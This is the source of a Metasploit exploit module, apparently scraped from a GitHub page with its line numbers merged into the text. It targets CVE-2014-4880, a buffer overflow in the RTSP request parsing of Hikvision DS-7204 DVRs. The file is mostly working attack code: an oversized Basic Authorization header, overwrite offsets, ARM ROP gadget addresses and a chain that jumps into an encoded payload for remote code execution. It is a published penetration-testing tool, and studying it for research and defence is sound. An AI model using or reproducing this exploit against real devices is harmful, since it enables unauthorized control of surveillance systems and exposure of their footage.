Path: blob/master/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',15'Description' => %q{16This module exploits a buffer overflow in the RTSP request parsing17code of Hikvision DVR appliances. The Hikvision DVR devices record18video feeds of surveillance cameras and offer remote administration19and playback of recorded footage.2021The vulnerability is present in several models / firmware versions22but due to the available test device this module only supports23the DS-7204 model.24},25'Author' => [26'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev27],28'License' => MSF_LICENSE,29'References' => [30[ 'CVE', '2014-4880' ],31[ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]32],33'Platform' => 'linux',34'Arch' => ARCH_ARMLE,35'Privileged' => true,36'Targets' => [37#38# ROP targets are difficult to represent in the hash, use callbacks instead39#40[41"DS-7204 Firmware V2.2.10 build 131009", {4243# The callback handles all target-specific settings44:callback => :target_ds7204_1,45'g_adjustesp' => 0x002c828c,46# ADD SP, SP, #0x35047# LDMFD SP!, {R4-R6,PC}4849'g_r3fromsp' => 0x00446f80,50# ADD R3, SP, #0x60+var_5851# BLX R65253'g_blxr3_pop' => 0x00456360,54# BLX R355# LDMFD SP!, {R1-R7,PC}5657'g_popr3' => 0x0000fe98,58# LDMFD SP!, {R3,PC}59}60],6162[63"Debug Target", {6465# The callback handles all target-specific settings66:callback => :target_debug6768}69]7071],72'DefaultTarget' => 0,73'DisclosureDate' => '2014-11-19',74'Notes' => {75'Reliability' => UNKNOWN_RELIABILITY,76'Stability' => UNKNOWN_STABILITY,77'SideEffects' => UNKNOWN_SIDE_EFFECTS78}79)80)8182register_options(83[84Opt::RPORT(554)85]86)87end8889def exploit90unless self.respond_to?(target[:callback], true)91fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")92end9394device_rop = self.send(target[:callback])9596request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"97request << "CSeq: 7\r\n"98request << "Authorization: Basic "99request << rand_text_alpha(0x280 + 34)100request << [target["g_adjustesp"]].pack("V")[0..2]101request << "\r\n\r\n"102request << rand_text_alpha(19)103104# now append the ropchain105request << device_rop106request << rand_text_alpha(8)107request << payload.encoded108109connect110sock.put(request)111disconnect112end113114# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc115def target_ds7204_1116# Create a fixed-size buffer for the rop chain117ropbuf = rand_text_alpha(24)118119# CHAIN = [120# 0, #R4 pop adjustsp121# 0, #R5 pop adjustsp122# GADGET_BLXR3_POP, #R6 pop adjustsp123# GADGET_POPR3,124# 0, #R3 pop125# GADGET_R3FROMSP,126# ]127128ropbuf[8, 4] = [target["g_blxr3_pop"]].pack("V")129ropbuf[12, 4] = [target["g_popr3"]].pack("V")130ropbuf[20, 4] = [target["g_r3fromsp"]].pack("V")131132return ropbuf133end134135# Generate a buffer that provides a starting point for exploit development136def target_debug137Rex::Text.pattern_create(2000)138end139140def rhost141datastore['RHOST']142end143144def rport145datastore['RPORT']146end147end148149150